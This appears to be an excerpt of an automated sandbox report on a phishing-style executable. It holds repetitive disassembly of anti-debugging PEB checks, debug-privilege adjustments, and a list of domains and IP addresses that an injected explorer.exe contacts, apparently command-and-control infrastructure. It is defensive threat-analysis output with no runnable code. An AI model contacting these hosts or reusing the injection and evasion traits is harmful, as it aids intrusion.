          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01324F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01324F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0134F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013BFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013BFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0133FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0133EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01338794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013637F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013DFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0132E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0132C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0132C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0132C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01358E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0134AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0134AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0134AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0134AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0134AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0133766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01337E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01337E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01337E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01337E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01337E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01337E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013EAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013EAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013BFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013376E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013516E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01368EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013536CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013DFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03952397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039E138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03931B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03931B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039DD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03954BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03954BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03954BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0394DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039E131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0392F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0392DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03953B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03953B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0392DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0393AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0393AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03952ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03952AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03925210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03925210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03925210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03925210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0392AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0392AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03943A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03938A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03964A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03964A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039EEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039B4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03929240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03929240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03929240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03929240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0396927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03952990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0394C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039B41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0392B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0392B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0392B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03929100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03929100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03929100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03944120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03944120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03944120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03944120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03944120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0394B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0394B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0392B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0392B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0392C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03929080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039690AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039BB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039258EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039A7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_0395002D mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_0393B02A mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_03940050 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039F1074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039E2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_03938794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039A7794 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039637F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_0394F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039BFF10 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039F070D mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_0395A70E mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_0395E730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_03924F2E mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_0393EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_0393FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039F8F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039BFE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039F0EA5 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039A46A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039F8ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_03968EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039536CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039DFEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039376E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039516E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_0395A61C mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_0392C600 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_03958E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039E1608 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039DFE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_0392E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_03937E41 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039EAE44 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_0394AE73 mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_0393766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_0395FD9B mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_03952581 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_03922D8A mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_03951DB5 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039F05AC mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039535A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039A6DC9 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039A6DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039A6DC9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039D8DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_0393D5E0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039EFDE2 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_0392AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_03933D34 mov eax, dword ptr fs:[00000030h] (13 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039EE539 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039F8D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039AA537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_03954D3B mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_03947D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_03963D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039A3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_0394C577 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_0393849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 17_2_039F8CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe | Process token adjusted: Debug (2 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe | Memory allocated: page read and write, page guard

          HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.bookitstaugustine.com
Source: C:\Windows\explorer.exe | Network Connect: 166.62.28.107 80
Source: C:\Windows\explorer.exe | Domain query: www.hepimizdostuz.com
Source: C:\Windows\explorer.exe | Network Connect: 154.210.110.99 80
Source: C:\Windows\explorer.exe | Domain query: www.szmsbk.com
Source: C:\Windows\explorer.exe | Domain query: www.merkuryindustries.com
Source: C:\Windows\explorer.exe | Domain query: www.pradnyanamaya.com
Source: C:\Windows\explorer.exe | Domain query: www.hnchotels.com
Source: C:\Windows\explorer.exe | Network Connect: 123.31.43.181 80
Source: C:\Windows\explorer.exe | Network Connect: 172.67.132.70 80
Source: C:\Windows\explorer.exe | Domain query: www.accessibleageing.com
Source: C:\Windows\explorer.exe | Network Connect: 3.223.115.185 80
Source: C:\Windows\explorer.exe | Network Connect: 81.88.57.70 80
Source: C:\Windows\explorer.exe | Domain query: www.thelandcle.com
Source: C:\Windows\explorer.exe | Network Connect: 198.185.159.144 80
Source: C:\Windows\explorer.exe | Domain query: www.beyju.store
Source: C:\Windows\explorer.exe | Domain query: www.theskineditco.com
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Network Connect: 185.199.108.153 80
Source: C:\Windows\explorer.exe | Network Connect: 85.17.172.1 80
Source: C:\Windows\explorer.exe | Domain query: www.tuyensinhhaiphong.com
Source: C:\Windows\explorer.exe | Network Connect: 52.15.160.167 80
Source: C:\Windows\explorer.exe | Domain query: www.belatopapparel.xyz

Maps a DLL or memory area into another process
